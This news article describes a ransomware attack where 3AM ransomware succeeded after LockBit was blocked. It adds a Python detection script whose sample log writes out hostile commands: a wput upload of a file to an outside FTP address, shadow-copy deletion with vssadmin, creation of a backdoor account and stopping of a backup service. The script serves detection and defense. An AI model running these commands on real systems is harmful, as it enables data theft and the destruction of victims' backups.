When LockBit Ransomware Fails, Attackers Deploy Brand-New 3AM

Published: 23/11/2024   Category: security




Nothing good happens after 2 a.m., they say, especially when hackers have two kinds of ransomware at their disposal.



In a recent attack against a construction company, hackers who failed to execute LockBit in the target network were observed deploying a second, never-before-seen ransomware, which managed to break through.
The new tool is rather standard fare, terminating various security and backup-related software before locking up files on its host. But it distinguishes itself with an adorable little theme: 3 a.m., a time when perhaps only insomniacs, hardcore night owls, and black hat hackers are still up and working.
In a report this week, researchers from Symantec described the first observed use of 3AM: a double-whammy attack in which the LockBit ransomware was blocked but 3AM then got through on one compromised machine.
"This is not the first time we've seen attackers use more than one ransomware family," warns Dick O'Brien, principal intelligence analyst for the Symantec Threat Hunter Team. "Organizations should expect this to happen."
Upon infiltrating the target network, the threat actors immediately began gathering user information and deploying tools for data harvesting. Early on, for instance, they deployed Cobalt Strike and used the remote execution tool PsExec in an attempt to escalate privileges.
Next, they ran reconnaissance commands such as whoami (prints the current user name) and netstat (displays network connections and listening ports); attempted to enumerate other servers they could use for lateral movement; and added a new user account for persistence. They then used the Wput utility to upload the victim's files to their own file transfer protocol (FTP) server.
At this point, with everything in place, the attackers intended to deploy LockBit, the latest sensation in modern ransomware-as-a-service. Unfortunately for them, the target's security controls wholly blocked the LockBit deployment.
But unfortunately for the victim, the attackers had a second weapon on hand: 3AM. The malware is so named because it appends the suffix .threeamtime to the files it encrypts and references that time of day in its ransom note.
"Hello," the note begins. "3 am The time of mysticism, isn't it? All your files are mysteriously encrypted, and the systems show no signs of life, the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to [sic] original state."
Compared with the note, the authors showed less creativity in the malware itself. 3AM is a 64-bit executable written in Rust, an increasingly popular language for attackers and defenders alike. It carries a long list of security and backup-related software that it attempts to terminate on the host, then gets to work: scanning the disk, identifying files of certain types, encrypting them, dropping the ransom note, and deleting any Volume Shadow Copy Service (VSS) snapshots that might otherwise give the victim a way to recover.
In this first deployment, the attackers only managed to push 3AM onto three machines, and it was blocked on two of them. It succeeded on the third, though, where LockBit had not. Rather than a testament to the power of 3AM, O'Brien reckons, it likely worked because it was a previously unseen threat, whereas LockBit is well known. The attackers claim to have stolen sensitive data from the compromised machine, though Symantec could not verify that.
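The following is an added detection example, not code from the article or from Symantec's report. It walks constructed process and file telemetry for the stages described above (recon commands, account creation, Wput exfiltration over FTP, service termination, shadow-copy deletion, and the .threeamtime rename) and reports the earliest stage seen on each host, since the cheapest place to stop the chain is as early as possible. The log line format, hostnames, users, paths, the Veeam service name, and the three-file encryption threshold are assumptions made for this example; `vssadmin delete shadows /all /quiet` is the standard Windows command for deleting VSS snapshots and is used here as representative backup-killing activity.

```python
import re
from collections import defaultdict

# Behaviours taken from the attack chain described in the article, in attack order.
# The regexes are assumptions about what the command lines look like in telemetry.
PROCESS_STAGES = [
    ("recon",        re.compile(r"^(whoami|netstat|net\s+view|quser)\b", re.I)),
    ("persistence",  re.compile(r"^net\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("exfil",        re.compile(r"^wput\b.*\bftp://", re.I)),
    ("service_kill", re.compile(r"^net\s+stop\s+", re.I)),
    ("backup_kill",  re.compile(r"^vssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
]

ENCRYPTED_SUFFIX = ".threeamtime"   # extension 3AM appends (from the article)
ENCRYPT_THRESHOLD = 3               # renames per host before we call it "encryption" (assumed)

# Assumed log line shape: <timestamp> host=<h> user=<u> proc="<cmd>" | file="<path>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'(?P<kind>proc|file)="(?P<val>[^"]*)"$'
)


def parse_line(line):
    """Parse one log line into a dict of fields, or None if it is malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_process(cmd):
    """Return the attack stage a command line maps to, or None if it matches nothing."""
    for stage, pattern in PROCESS_STAGES:
        if pattern.search(cmd):
            return stage
    return None


def detect(lines):
    """Return {host: {stage: [evidence, ...]}} for every stage observed per host."""
    findings = defaultdict(lambda: defaultdict(list))
    renamed = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue            # skip unparseable lines instead of aborting the sweep
        if ev["kind"] == "proc":
            stage = classify_process(ev["val"])
            if stage:
                findings[ev["host"]][stage].append(ev["val"])
        elif ev["val"].lower().endswith(ENCRYPTED_SUFFIX):
            renamed[ev["host"]].append(ev["val"])
    # A single renamed file is noise; a burst of them is the encryptor at work.
    for host, paths in renamed.items():
        if len(paths) >= ENCRYPT_THRESHOLD:
            findings[host]["encryption"] = paths
    return {h: dict(s) for h, s in findings.items()}


def earliest_stage(host_findings):
    """Earliest stage seen on a host, in attack order: where a block would have saved the most."""
    order = [s for s, _ in PROCESS_STAGES] + ["encryption"]
    for stage in order:
        if stage in host_findings:
            return stage
    return None


# Constructed sample telemetry; hostnames, users, paths and the FTP address are invented.
SAMPLE_LOG = """\
2024-11-20T02:58:03Z host=WS01 user=jsmith proc="whoami"
2024-11-20T02:58:09Z host=WS01 user=jsmith proc="netstat -an"
2024-11-20T03:01:44Z host=WS01 user=jsmith proc="net user svc_backup P@ss123 /add"
2024-11-20T03:07:12Z host=WS01 user=jsmith proc="wput C:\\Share\\contracts.zip ftp://198.51.100.7/up/"
2024-11-20T03:12:30Z host=WS01 user=jsmith proc="net stop VeeamBackupSvc"
2024-11-20T03:12:31Z host=WS01 user=jsmith proc="vssadmin.exe delete shadows /all /quiet"
2024-11-20T03:12:35Z host=WS01 user=jsmith file="C:\\Users\\jsmith\\Documents\\budget.xlsx.threeamtime"
2024-11-20T03:12:35Z host=WS01 user=jsmith file="C:\\Users\\jsmith\\Documents\\plans.dwg.threeamtime"
2024-11-20T03:12:36Z host=WS01 user=jsmith file="C:\\Users\\jsmith\\Documents\\invoice.pdf.threeamtime"
2024-11-20T09:15:00Z host=WS02 user=admin proc="whoami"
this line is garbage and must be skipped
"""

if __name__ == "__main__":
    results = detect(SAMPLE_LOG.splitlines())
    for host, stages in results.items():
        print(host, "earliest stage:", earliest_stage(stages), "stages:", sorted(stages))
```

On the sample above, WS01 lights up every stage and its earliest hit is the recon commands, which is exactly the point the article makes about defense in depth: a block on the whoami/netstat burst or the account creation would have mattered more than a block on the payload. WS02 shows only a lone whoami, which on its own is a weak signal and should be correlated with the other stages before anyone is paged.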
When it comes to stopping one piece of ransomware, let alone two, O'Brien advises that defense in depth is the best strategy. Ransomware attacks are multistage operations, and organizations should address every stage of a potential attack rather than focusing only on blocking payloads.
"The earlier you stop an attack, the better," he says.
